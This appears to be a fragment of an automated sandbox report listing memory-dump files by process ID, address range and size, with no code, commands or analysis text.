memory/5080-512-0x00000000067E5000-0x00000000067E7000-memory.dmpFilesize
8KB
-
memory/5080-506-0x00000000067E0000-0x00000000067E1000-memory.dmpFilesize
4KB
-
memory/5188-245-0x00000000020C0000-0x00000000020C1000-memory.dmpFilesize
4KB
-
memory/5188-221-0x0000000000000000-mapping.dmp
-
memory/5212-358-0x0000000000870000-0x00000000008A0000-memory.dmpFilesize
192KB
-
memory/5212-298-0x0000000000000000-mapping.dmp
-
memory/5252-372-0x0000000000000000-mapping.dmp
-
memory/5316-314-0x000000001AE00000-0x000000001AE02000-memory.dmpFilesize
8KB
-
memory/5316-302-0x0000000000000000-mapping.dmp
-
memory/5316-305-0x00000000002B0000-0x00000000002B1000-memory.dmpFilesize
4KB
-
memory/5336-325-0x0000000000000000-mapping.dmp
-
memory/5348-385-0x00000000021B0000-0x00000000021B1000-memory.dmpFilesize
4KB
-
memory/5348-381-0x0000000000000000-mapping.dmp
-
memory/5408-383-0x0000000000000000-mapping.dmp
-
memory/5408-390-0x0000000001110000-0x0000000001112000-memory.dmpFilesize
8KB
-
memory/5408-392-0x0000000001114000-0x0000000001115000-memory.dmpFilesize
4KB
-
memory/5408-396-0x0000000001115000-0x0000000001116000-memory.dmpFilesize
4KB
-
memory/5408-395-0x0000000001116000-0x0000000001117000-memory.dmpFilesize
4KB
-
memory/5496-249-0x0000000000000000-mapping.dmp
-
memory/5496-256-0x0000000000CE0000-0x0000000000CE2000-memory.dmpFilesize
8KB
-
memory/5524-337-0x00000157AF455000-0x00000157AF457000-memory.dmpFilesize
8KB
-
memory/5524-322-0x00000157AF450000-0x00000157AF452000-memory.dmpFilesize
8KB
-
memory/5524-315-0x0000015794BD0000-0x0000015794BD1000-memory.dmpFilesize
4KB
-
memory/5524-333-0x00000157AF452000-0x00000157AF454000-memory.dmpFilesize
8KB
-
memory/5524-335-0x00000157AF454000-0x00000157AF455000-memory.dmpFilesize
4KB
-
memory/5524-309-0x0000000000000000-mapping.dmp
-
memory/5752-263-0x0000000000000000-mapping.dmp
-
memory/5752-266-0x00000000009B0000-0x00000000009B1000-memory.dmpFilesize
4KB
-
memory/5760-348-0x0000000000000000-mapping.dmp
-
memory/5852-339-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5852-334-0x0000000000000000-mapping.dmp
-
memory/5928-417-0x0000000001A40000-0x0000000001A42000-memory.dmpFilesize
8KB
-
memory/5928-272-0x0000000000B30000-0x0000000000B31000-memory.dmpFilesize
4KB
-
memory/5928-269-0x0000000000000000-mapping.dmp
-
memory/5976-273-0x0000000000000000-mapping.dmp
-
memory/5976-300-0x000000001B040000-0x000000001B042000-memory.dmpFilesize
8KB
-
memory/5976-278-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/5976-286-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/5984-409-0x0000000000000000-mapping.dmp
-
memory/6056-330-0x0000000000000000-mapping.dmp
-
memory/6084-285-0x0000000000000000-mapping.dmp
-
memory/6084-290-0x0000000000560000-0x0000000000561000-memory.dmpFilesize
4KB
-
memory/6084-301-0x000000001B1A0000-0x000000001B1A2000-memory.dmpFilesize
8KB
-
memory/6108-332-0x0000000000000000-mapping.dmp
-
memory/6124-382-0x0000000000000000-mapping.dmp
-
memory/6124-388-0x0000000001210000-0x0000000001212000-memory.dmpFilesize
8KB
-
memory/6132-398-0x0000000000000000-mapping.dmp